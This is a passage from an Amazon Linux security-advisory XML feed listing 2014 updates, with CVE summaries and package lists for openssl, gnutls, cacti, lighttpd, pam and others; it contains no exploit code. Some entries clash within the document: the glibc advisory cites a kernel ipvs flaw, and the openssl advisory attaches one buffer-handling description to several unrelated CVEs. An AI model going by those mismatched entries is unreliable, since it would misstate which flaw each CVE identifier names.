arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.39" 
release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.39-1.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-345</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-345: medium priority package update for elfutils</title><issued date="2014-05-21 10:48:00" /><updated date="2014-09-18 00:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0172:
Integer overflow in the check_section function in dwarf_begin_elf.c in the libdw library, as used in elfutils 0.153 and possibly through 0.158, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a malformed compressed debug section in an ELF file, which triggers a heap-based buffer overflow.
1085663:
CVE-2014-0172 elfutils: integer overflow, leading to a heap-based buffer overflow in libdw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0172" title="" id="CVE-2014-0172" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="elfutils-debuginfo" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-debuginfo-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-devel-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libelf" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libelf-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libelf-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libelf-devel-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libelf-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libelf-devel-static-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-devel-static-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libs" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libs-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-devel-static-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libelf" version="0.158" release="3.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/elfutils-libelf-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-devel-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-debuginfo" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-debuginfo-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libs" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libs-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libelf-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libelf-devel-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libelf-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libelf-devel-static-0.158-3.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-346</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-346: medium priority package update for lighttpd</title><issued date="2014-06-03 14:50:00" /><updated date="2014-09-18 00:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2324:
Multiple directory traversal vulnerabilities in (1) mod_evhost and (2) mod_simple_vhost in lighttpd before 1.4.35 allow remote attackers to read arbitrary files via a .. (dot dot) in the host name, related to request_check_hostname.
1075703:
CVE-2014-2323 CVE-2014-2324 lighttpd: SQL injection and directory traversal vulnerabilities
CVE-2014-2323:
SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
1075703:
CVE-2014-2323 CVE-2014-2324 lighttpd: SQL injection and directory traversal vulnerabilities
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323" title="" id="CVE-2014-2323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324" title="" id="CVE-2014-2324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-mod_mysql_vhost" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.35" 
release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.35-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-347</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-347: medium priority package update for cacti</title><issued date="2014-06-03 14:59:00" /><updated date="2014-09-18 00:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2709:
lib/rrd.php in Cacti 0.8.7g, 0.8.8b, and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in unspecified parameters.
1084258:
CVE-2014-2708 CVE-2014-2709 cacti: command injection issues fixed in bug#0002405
CVE-2014-2708:
Multiple SQL injection vulnerabilities in graph_xport.php in Cacti 0.8.7g, 0.8.8b, and earlier allow remote attackers to execute arbitrary SQL commands via the (1) graph_start, (2) graph_end, (3) graph_height, (4) graph_width, (5) graph_nolegend, (6) print_source, (7) local_graph_id, or (8) rra_id parameter.
1084258:
CVE-2014-2708 CVE-2014-2709 cacti: command injection issues fixed in bug#0002405
CVE-2014-2328:
lib/graph_export.php in Cacti 0.8.7g, 0.8.8b, and earlier allows remote authenticated users to execute arbitrary commands via shell metacharacters in unspecified vectors.
1082122:
CVE-2014-2326 CVE-2014-2327 CVE-2014-2328 cacti: multiple flaws reported by Deutsche Telekom
CVE-2014-2327:
Cross-site request forgery (CSRF) vulnerability in Cacti 0.8.7g, 0.8.8b, and earlier allows remote attackers to hijack the authentication of users for unspecified commands, as demonstrated by requests that (1) modify binary files, (2) modify configurations, or (3) add arbitrary users.
1082122:
CVE-2014-2326 CVE-2014-2327 CVE-2014-2328 cacti: multiple flaws reported by Deutsche Telekom
CVE-2014-2326:
Cross-site scripting (XSS) vulnerability in cdef.php in Cacti 0.8.7g, 0.8.8b, and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
1082122:
CVE-2014-2326 CVE-2014-2327 CVE-2014-2328 cacti: multiple flaws reported by Deutsche Telekom
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2326" title="" id="CVE-2014-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2327" title="" id="CVE-2014-2327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2328" title="" id="CVE-2014-2328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2708" title="" id="CVE-2014-2708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2709" title="" id="CVE-2014-2709" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8b" release="5.4.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8b-5.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-348</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-348: low priority package update for munin</title><issued date="2014-06-03 15:03:00" /><updated date="2014-09-18 00:39:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6359:
Munin::Master::Node in Munin before 2.0.18 allows remote attackers to cause a denial of service (abort data collection for node) via a plugin that uses "multigraph" as a multigraph service name.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
CVE-2013-6048:
The get_group_tree function in lib/Munin/Master/HTMLConfig.pm in Munin before 2.0.18 allows remote nodes to cause a denial of service (infinite loop and memory consumption in the munin-html process) via crafted multigraph data.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6048" title="" id="CVE-2013-6048" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6359" title="" id="CVE-2013-6359" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="munin-async" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-nginx" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-nginx-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-cgi" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-cgi-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-ruby-plugins" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-ruby-plugins-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-netip-plugins" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-netip-plugins-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-common" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.20-1.36.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-349</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-349: important priority package update for openssl</title><issued date="2014-06-04 15:45:00" /><updated date="2015-03-19 13:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0292:
An integer underflow flaw, leading to a heap-based buffer overflow, was found in the way OpenSSL decoded certain base64 strings. A remote attacker could provide a specially crafted base64 string via certain PEM processing routines that, when parsed by the OpenSSL library, would cause the OpenSSL server to crash.
1202395:
CVE-2015-0292 openssl: integer underflow leading to buffer overflow in base64 decoding
CVE-2014-3470:
CVE-2014-0224:
CVE-2014-0221:
CVE-2014-0198:
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or server using OpenSSL could crash or unexpectedly drop connections when processing certain SSL traffic.
CVE-2014-0195:
CVE-2010-5298:
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or server using OpenSSL could crash or unexpectedly drop connections when processing certain SSL traffic.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298" title="" id="CVE-2010-5298" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195" title="" id="CVE-2014-0195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198" title="" id="CVE-2014-0198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221" title="" id="CVE-2014-0221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" title="" id="CVE-2014-0224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470" title="" id="CVE-2014-3470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0292" title="" id="CVE-2015-0292" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0625.html" title="" id="RHSA-2014:0625" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1h" release="1.72.amzn1" 
epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1h-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-350</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-350: important priority package update for openssl098e</title><issued date="2014-06-05 15:38:00" /><updated date="2014-09-18 00:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0224:
It was found that OpenSSL clients and servers could be forced, via a specially crafted handshake packet, to use weak keying material for communication. A man-in-the-middle attacker could use this flaw to decrypt and modify traffic between a client and a server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" title="" id="CVE-2014-0224" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0626.html" title="" id="RHSA-2014:0626" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl098e-debuginfo" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-debuginfo-0.9.8e-18.2.13.amzn1.x86_64.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-0.9.8e-18.2.13.amzn1.x86_64.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-debuginfo-0.9.8e-18.2.13.amzn1.i686.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-0.9.8e-18.2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-351</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-351: important priority package update for openssl097a</title><issued date="2014-06-05 15:38:00" /><updated date="2014-09-19 10:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0224:
It was found that OpenSSL clients and servers could be forced, via a specially crafted handshake packet, to use weak keying material for communication. A man-in-the-middle attacker could use this flaw to decrypt and modify traffic between a client and a server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" title="" id="CVE-2014-0224" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0626.html" title="" id="RHSA-2014:0626" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl097a-debuginfo" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl097a-debuginfo-0.9.7a-12.1.9.amzn1.x86_64.rpm</filename></package><package name="openssl097a" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl097a-0.9.7a-12.1.9.amzn1.x86_64.rpm</filename></package><package name="openssl097a" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/openssl097a-0.9.7a-12.1.9.amzn1.i686.rpm</filename></package><package name="openssl097a-debuginfo" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/openssl097a-debuginfo-0.9.7a-12.1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-352</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-352: important priority package update for gnutls</title><issued date="2014-06-05 15:38:00" /><updated date="2014-09-19 10:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3466:
A flaw was found in the way GnuTLS parsed session IDs from ServerHello messages of the TLS/SSL handshake. A malicious server could use this flaw to send an excessively long session ID value, which would trigger a buffer overflow in a connecting TLS/SSL client application using GnuTLS, causing the client application to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3466" title="" id="CVE-2014-3466" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0595.html" title="" id="RHSA-2014:0595" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-guile" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="14.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/gnutls-guile-2.8.5-14.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-353</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-353: important priority package update for libmicrohttpd</title><issued date="2014-06-15 16:17:00" /><updated date="2014-09-19 10:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7039:
Stack-based buffer overflow in the MHD_digest_auth_check function in libmicrohttpd before 0.9.32, when MHD_OPTION_CONNECTION_MEMORY_LIMIT is set to a large value, allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long URI in an authentication header.
1039390:
CVE-2013-7039 libmicrohttpd: stack overflow in MHD_digest_auth_check()
CVE-2013-7038:
The MHD_http_unescape function in libmicrohttpd before 0.9.32 might allow remote attackers to obtain sensitive information or cause a denial of service (crash) via unspecified vectors that trigger an out-of-bounds read.
1039384:
CVE-2013-7038 libmicrohttpd: out-of-bounds read in MHD_http_unescape()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7038" title="" id="CVE-2013-7038" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7039" title="" id="CVE-2013-7039" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libmicrohttpd-devel" version="0.9.33" release="2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmicrohttpd-devel-0.9.33-2.3.amzn1.x86_64.rpm</filename></package><package name="libmicrohttpd" version="0.9.33" release="2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmicrohttpd-0.9.33-2.3.amzn1.x86_64.rpm</filename></package><package name="libmicrohttpd-doc" version="0.9.33" release="2.3.amzn1" epoch="0" arch="noarch"><filename>Packages/libmicrohttpd-doc-0.9.33-2.3.amzn1.noarch.rpm</filename></package><package name="libmicrohttpd-debuginfo" version="0.9.33" release="2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmicrohttpd-debuginfo-0.9.33-2.3.amzn1.x86_64.rpm</filename></package><package name="libmicrohttpd-devel" version="0.9.33" release="2.3.amzn1" epoch="0" arch="i686"><filename>Packages/libmicrohttpd-devel-0.9.33-2.3.amzn1.i686.rpm</filename></package><package name="libmicrohttpd" version="0.9.33" release="2.3.amzn1" epoch="0" arch="i686"><filename>Packages/libmicrohttpd-0.9.33-2.3.amzn1.i686.rpm</filename></package><package name="libmicrohttpd-debuginfo" version="0.9.33" release="2.3.amzn1" epoch="0" arch="i686"><filename>Packages/libmicrohttpd-debuginfo-0.9.33-2.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-354</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-354: medium priority package update for pam</title><issued date="2014-06-15 16:18:00" /><updated date="2014-09-19 10:21:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2583:
Multiple directory traversal vulnerabilities in pam_timestamp.c in the pam_timestamp module for Linux-PAM (aka pam) 1.1.8 allow local users to create arbitrary files or possibly bypass authentication via a .. (dot dot) in the (1) PAM_RUSER value to the get_ruser function or (2) PAM_TTY value to the check_tty function, which is used by the format_timestamp_name function.
1080243:
CVE-2014-2583 pam: path traversal issue in pam_timestamp's format_timestamp_name()
CVE-2013-7041:
The pam_userdb module for Pam uses a case-insensitive method to compare hashed passwords, which makes it easier for attackers to guess the password via a brute force attack.
1038555:
CVE-2013-7041 pam: pam_userdb case insensitive password hash comparison
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7041" title="" id="CVE-2013-7041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2583" title="" id="CVE-2014-2583" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam" version="1.1.8" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-1.1.8-9.29.amzn1.x86_64.rpm</filename></package><package name="pam-devel" version="1.1.8" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-devel-1.1.8-9.29.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-debuginfo-1.1.8-9.29.amzn1.x86_64.rpm</filename></package><package name="pam" version="1.1.8" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/pam-1.1.8-9.29.amzn1.i686.rpm</filename></package><package name="pam-devel" version="1.1.8" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/pam-devel-1.1.8-9.29.amzn1.i686.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/pam-debuginfo-1.1.8-9.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-355</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-355: low priority package update for glibc</title><issued date="2014-06-15 16:19:00" /><updated date="2014-09-19 10:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4588:
Multiple stack-based buffer overflows in net/netfilter/ipvs/ip_vs_ctl.c in the Linux kernel before 2.6.33, when CONFIG_IP_VS is used, allow local users to gain privileges by leveraging the CAP_NET_ADMIN capability for (1) a getsockopt system call, related to the do_ip_vs_get_ctl function, or (2) a setsockopt system call, related to the do_ip_vs_set_ctl function.
1030800:
CVE-2013-4588 Kernel: net: ipvs: stack buffer overflow
